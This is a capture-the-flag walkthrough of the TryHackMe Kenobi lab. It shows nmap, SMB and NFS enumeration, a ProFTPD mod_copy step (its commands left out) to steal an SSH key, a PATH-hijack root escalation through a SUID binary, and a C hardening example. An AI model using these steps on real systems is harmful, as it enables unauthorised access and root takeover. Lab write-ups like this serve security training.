Help Me, Obi-Wan Kenobi. You're My Only Hope: Navigating the Kenobi CTF on TryHackMe
This walkthrough covers the Kenobi CTF found on TryHackMe. It includes accessing a Samba share, exploiting a vulnerable version of ProFTPD to gain initial access, and escalating privileges to root using a SUID binary.
Step 1: Nmap
nmap -A -p- -T4 10.10.117.14 -vvv
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 ProFTPD 1.3.5
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8m00IxH/X5gfu6Cryqi5Ti2TKUSpqgmhreJsfLL8uBJrGAKQApxZ0lq2rKplqVMs+xwlGTuHNZBVeURqvOe9MmkMUOh4ZIXZJ9KNaBoJb27fXIvsS6sgPxSUuaeoWxutGwHHCDUbtqHuMAoSE2Nwl8G+VPc2DbbtSXcpu5c14HUzktDmsnfJo/5TFiRuYR0uqH8oDl6Zy3JSnbYe/QY+AfTpr1q7BDV85b6xP97/1WUTCw54CKUTV25Yc5h615EwQOMPwox94+48JVmgE00T4ARC3l6YWibqY6a5E8BU+fksse35fFCwJhJEk6xplDkeauKklmVqeMysMWdiAQtDj
| 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBpJvoJrIaQeGsbHE9vuz4iUyrUahyfHhN7wq9z3uce9F+Cdeme1O+vIfBkmjQJKWZ3vmezLSebtW3VRxKKH3n8=
| 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGB22m99Wlybun7o/h9e6Ea/9kHMT0Dz2GqSodFqIWDi
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
111/tcp open rpcbind syn-ack ttl 61 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100005 1,2,3 51719/udp6 mountd
| 100005 1,2,3 55558/udp mountd
| 100005 1,2,3 59043/tcp mountd
| 100005 1,2,3 60167/tcp6 mountd
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open syn-ack ttl 61 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs_acl syn-ack ttl 61 2-3 (RPC #100227)
34619/tcp open nlockmgr syn-ack ttl 61 1-4 (RPC #100021)
46053/tcp open mountd syn-ack ttl 61 1-3 (RPC #100005)
59043/tcp open mountd syn-ack ttl 61 1-3 (RPC #100005)
60883/tcp open mountd syn-ack ttl 61 1-3 (RPC #100005)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Uptime guess: 0.003 days (since Fri Jul 7 17:22:14 2023)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m03s, deviation: 2h53m12s, median: 2s
| nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| KENOBI<00> Flags: <unique><active>
| KENOBI<03> Flags: <unique><active>
| KENOBI<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb2-time:
| date: 2023-07-07T23:26:33
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: kenobi
| NetBIOS computer name: KENOBI\x00
| Domain name: \x00
| FQDN: kenobi
|_ System time: 2023-07-07T18:26:33-05:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 18419/tcp): CLEAN (Couldn't connect)
| Check 2 (port 14290/tcp): CLEAN (Couldn't connect)
| Check 3 (port 27356/udp): CLEAN (Failed to receive data)
| Check 4 (port 22821/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
This box exposes several services worth enumerating for information that leads to an initial foothold. To begin, we will focus on port 445, SMB.
Step 2: Enumerate SMB
Using nmap scripts we can further enumerate port 445 to find available shares.
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.165.161
There are a total of 3 shares. Let's connect to one of them using smbclient.
smbclient //10.10.165.161/anonymous
Upon connecting, we discover a log.txt file. We can pull this down using the smbget command.
smbget -R smb://10.10.165.161/anonymous
Step 3: Enumerate NFS
Similar to SMB, we can use nmap scripts to further enumerate NFS.
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.165.161
We discover that /var is exported over NFS and can be mounted.
Step 4: ProFTPD
Using netcat we can confirm from its banner which version of ProFTPD is running.
nc 10.10.165.161 21
Let's use searchsploit to see if this version has a known vulnerability.
searchsploit ProFtpd 1.3.5
Looks like there is a Metasploit module for mod_copy. But let's do this the manual way using netcat.
What we did was move the private key over to /var/tmp, since our NFS enumeration showed that /var is exported. Let's mount it now.
mkdir /mnt/kenobiNFS
mount 10.10.165.161:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
We now have the export mounted on our attack box. Let's pull down the id_rsa SSH key and use it to connect to the box as the kenobi user.
We're in! You'll find your first flag at /home/kenobi/user.txt.
Step 5: Privesc and Root
Let's search the system for SUID binaries, which run with their owner's privileges rather than ours.
find / -perm -u=s -type f 2>/dev/null
The binary /usr/bin/menu is not a standard system binary and can be used to elevate privileges. Let's work from the /tmp directory since we know it's writable. There we create a file named curl that runs /bin/sh, make it executable, and put /tmp at the front of our PATH so that the menu binary finds our curl before the real one.
cd /tmp
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH
/usr/bin/menu
And we have root! Type cat /root/root.txt and you'll find your last flag.
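Why the PATH trick in Step 5 works, and how a SUID helper should be written so that it does not, as an added C example (this is not the box's own menu binary, whose source is not on the page; the curl and uname commands it runs are assumed):

```c
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Weak pattern (assumed; the Kenobi menu binary's source is not on the page):
 * a shell command naming "curl" without a path, run under whatever PATH the
 * caller supplies. With /tmp first in PATH, "curl" resolves to the caller's
 * file, and a SUID binary then runs that file as root. */
void weak_menu_choice(void) {
    system("curl -I localhost");
}

/* Hardened pattern: each menu number maps to an absolute path and a fixed
 * argv, executed without a shell, so PATH and user input play no part. */
#define NCHOICES 2
static const char *const CHOICES[NCHOICES][4] = {
    {"/usr/bin/curl", "-I", "localhost", NULL},
    {"/bin/uname", "-r", NULL, NULL},
};

/* Returns the absolute program path for menu choice 1..NCHOICES, else NULL. */
const char *resolve_choice(int choice) {
    if (choice < 1 || choice > NCHOICES) return NULL;
    return CHOICES[choice - 1][0];
}

/* Replace the inherited PATH with a known-good value and drop IFS, so even an
 * accidental unqualified lookup cannot be steered by the caller. 0 on success. */
int sanitize_environment(void) {
    if (setenv("PATH", "/usr/bin:/bin", 1) != 0) return -1;
    unsetenv("IFS");
    return 0;
}

/* Run the chosen program via fork/execv with its fixed argv.
 * Returns the child's exit status, or -1 on an invalid choice or failure. */
int run_choice(int choice) {
    if (resolve_choice(choice) == NULL || sanitize_environment() != 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execv(CHOICES[choice - 1][0], (char *const *)CHOICES[choice - 1]);
        _exit(127); /* only reached if execv fails */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status);
}
```

With a fixed PATH and absolute paths, placing a file named curl in /tmp has no effect on what the hardened helper executes.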
I hope you enjoyed this walkthrough of the Kenobi CTF found on TryHackMe. Happy Hacking.